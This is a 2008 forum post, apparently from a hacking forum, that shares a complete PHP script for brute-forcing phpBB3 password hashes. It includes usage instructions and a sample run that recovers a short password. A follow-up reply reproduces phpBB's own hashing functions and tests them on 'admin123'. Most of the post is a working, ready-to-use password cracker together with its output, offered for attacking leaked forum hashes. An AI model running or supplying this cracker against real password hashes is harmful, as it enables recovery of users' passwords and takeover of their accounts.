puskin Posted July 13, 2008 Report Posted July 13, 2008 #!/usr/bin/php<?phpset_time_limit(0);echo "///////////////////////////////////////////////\r\n";echo "// PHPBB3 Bruteforce //\r\n";echo "// Original bruteforce script by Tux //\r\n";echo "// Moded for Phpbb3 by Jeforce //\r\n";echo "// [url]http://www.jeforce.net[/url] //\r\n";echo "////////////////////////////////////////////\r\n";if ($argc<2 || $argv[1]=='--help') { echo<<<ENDUSAGE: {$argv[0]} 'hash' chars - hash : The hash to crack - chars : Max length string to attempt to crackHELP: {$argv[0]} --helpEND; exit;}//Fonction PHPBB3function _hash_crypt_private($password, $setting, &$itoa64){$output = '*';// Check for correct hashif (substr($setting, 0, 3) != '$H$'){return $output;}$count_log2 = strpos($itoa64, $setting[3]);if ($count_log2 < 7 || $count_log2 > 30){return $output;}$count = 1 << $count_log2;$salt = substr($setting, 4, 8);if (strlen($salt) != 8){return $output;}$hash = pack('H*', md5($salt . $password));do{$hash = pack('H*', md5($hash . $password));}while (--$count);$output = substr($setting, 0, 12);$output .= _hash_encode64($hash, 16, $itoa64);return $output;}function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6){if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31){$iteration_count_log2 = 8;}$output = '$H$';$output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)];$output .= _hash_encode64($input, 6, $itoa64);return $output;}/*** Encode hash*/function _hash_encode64($input, $count, &$itoa64){$output = '';$i = 0;do{$value = ord($input[$i++]);$output .= $itoa64[$value & 0x3f];if ($i < $count){$value |= ord($input[$i]) << 8;}$output .= $itoa64[($value >> 6) & 0x3f];if ($i++ >= $count){break;}if ($i < $count){$value |= ord($input[$i]) << 16;}$output .= $itoa64[($value >> 12) & 0x3f];if ($i++ >= $count){break;}$output .= $itoa64[($value >> 18) & 0x3f];}while ($i < $count);return $output;}function phpbb_check_hash($password, $hash){$itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';if (strlen($hash) == 34){return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false;}return (md5($password) === $hash) ? true : false;}//if(isset($argv[4])) $charset=$argv[4];//else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';$charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';$charset_beginning = $charset{0};$charset_end = $charset{strlen($charset)-1};//$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80';// $SIZE = (int) $_GET['chars'];$HASH = $argv[1];$SIZE = (int) $argv[2];$start = time()-1;$curtotal=0;$total=0;for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i);$split=ceil(($total/strlen($charset))/5);echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n";echo " *** TOTAL KEYS: $total\r\n";echo " *** CHARSET: $charset\r\n";for($i=1; $i<=$SIZE; $i++) { $keyspace = pow(strlen($charset), $i); echo "\r\nAttempting to crack with $i characters.\r\n"; echo " *** Total combinations: $keyspace\r\n"; $key = ''; for ($y=0; $y<$i; $y++) $key .= $charset_beginning; for ($x=0; $x<$keyspace+1; $x++) { $curtotal++; if (phpbb_check_hash($key, $HASH)) { $time=(time()-$start); echo<<<ENDSuccessfully key cracked after $time seconds. The cracker searched a totalof $curtotal keys out of a possible $total in $time seconds.Found the clear text of '$HASH' is '$key'.\nEND; exit; } if($x%$split == 0) { $rate=ceil($curtotal/(time()-$start)); echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n"; } for ($y=0; $y<$i; $y++) { if ($key[$y] != $charset_end) { $key[$y] = $charset{strpos($charset, $key[$y])+1}; if ($y > 0) for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning; break; } } }}$time=time()-$start;echo<<<END*** SORRY NO MATCHS FOUND Time running : $time. Keys searched : $total.\nEND;?>Usage:php script.php 'hash' charsExamplejeforce@localhost:/var/www$ php5 phpbb3bruteforce.php '$H$9th2E96doaV4kIqYd8tH4kNdSdaXR4.' 4///////////////////////////////////////////////// PHPBB3 Bruteforcer //// Original bruteforce script by Tux //// Moded for Phpbb3 by Jeforce //// [url]http://www.jeforce.net[/url] //////////////////////////////////////////////*** MAX SIZE: 4, cracking HASH: $H$9th2E96doaV4kIqYd8tH4kNdSdaXR4.*** TOTAL KEYS: 15018570*** CHARSET: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789Attempting to crack with 1 characters.*** Total combinations: 62... 1/15018570 (a) [1 Keys/second]Attempting to crack with 2 characters.*** Total combinations: 3844... 64/15018570 (aa) [64 Keys/second]Successfully key cracked after 12 seconds. The cracker searched a totalof 3434 keys out of a possible 15018570 in 12 seconds.Found the clear text of '$H$9th2E96doaV4kIqYd8tH4kNdSdaXR4.' is 'w2'.Credit:http://www.h4cky0u.orgsau:<?function phpbb_hash($password){$itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';$random_state = unique_id();$random = '';$count = 6;if (($fh = @fopen('/dev/urandom', 'rb'))){$random = fread($fh, $count);fclose($fh);}if (strlen($random) < $count){$random = '';for ($i = 0; $i < $count; $i += 16){$random_state = md5(unique_id() . $random_state);$random .= pack('H*', md5($random_state));}$random = substr($random, 0, $count);}$hash = _hash_crypt_private($password, _hash_gensalt_private($random, $itoa64), $itoa64);if (strlen($hash) == 34){return $hash;}return md5($password);}function unique_id($extra = 'c'){static $dss_seeded = false;global $config;$val = $config['rand_seed'] . microtime();$val = md5($val);$config['rand_seed'] = md5($config['rand_seed'] . $val . $extra);if ($dss_seeded !== true && ($config['rand_seed_last_update'] < time() - rand(1,10))){$config['rand_seed_last_update']=time();$dss_seeded = true;}return substr($val, 4, 16);}function _hash_crypt_private($password, $setting, &$itoa64){$output = '*';// Check for correct hashif (substr($setting, 0, 3) != '$H$'){return $output;}$count_log2 = strpos($itoa64, $setting[3]);if ($count_log2 < 7 || $count_log2 > 30){return $output;}$count = 1 << $count_log2;$salt = substr($setting, 4, 8);if (strlen($salt) != 8){return $output;}/*** We're kind of forced to use MD5 here since it's the only* cryptographic primitive available in all versions of PHP* currently in use. To implement our own low-level crypto* in PHP would result in much worse performance and* consequently in lower iteration counts and hashes that are* quicker to crack (by non-PHP code).*/$hash = pack('H*', md5($salt . $password));do{$hash = pack('H*', md5($hash . $password));}while (--$count);$output = substr($setting, 0, 12);$output .= _hash_encode64($hash, 16, $itoa64);return $output;}function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6){if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31){$iteration_count_log2 = 8;}$output = '$H$';$output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)];$output .= _hash_encode64($input, 6, $itoa64);return $output;}/*** Encode hash*/function _hash_encode64($input, $count, &$itoa64){$output = '';$i = 0;do{$value = ord($input[$i++]);$output .= $itoa64[$value & 0x3f];if ($i < $count){$value |= ord($input[$i]) << 8;}$output .= $itoa64[($value >> 6) & 0x3f];if ($i++ >= $count){break;}if ($i < $count){$value |= ord($input[$i]) << 16;}$output .= $itoa64[($value >> 12) & 0x3f];if ($i++ >= $count){break;}$output .= $itoa64[($value >> 18) & 0x3f];}while ($i < $count);return $output;}function phpbb_check_hash($password, $hash){$itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';if (strlen($hash) == 34){return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false;}return (md5($password) === $hash) ? true : false;}$val=phpbb_hash('admin123');if(phpbb_check_hash("admin123", $val)){echo "Value is true";}else{echo "val is false";}#."<br>".phpbb_hash('admin123');?>[quote][/quote] Quote
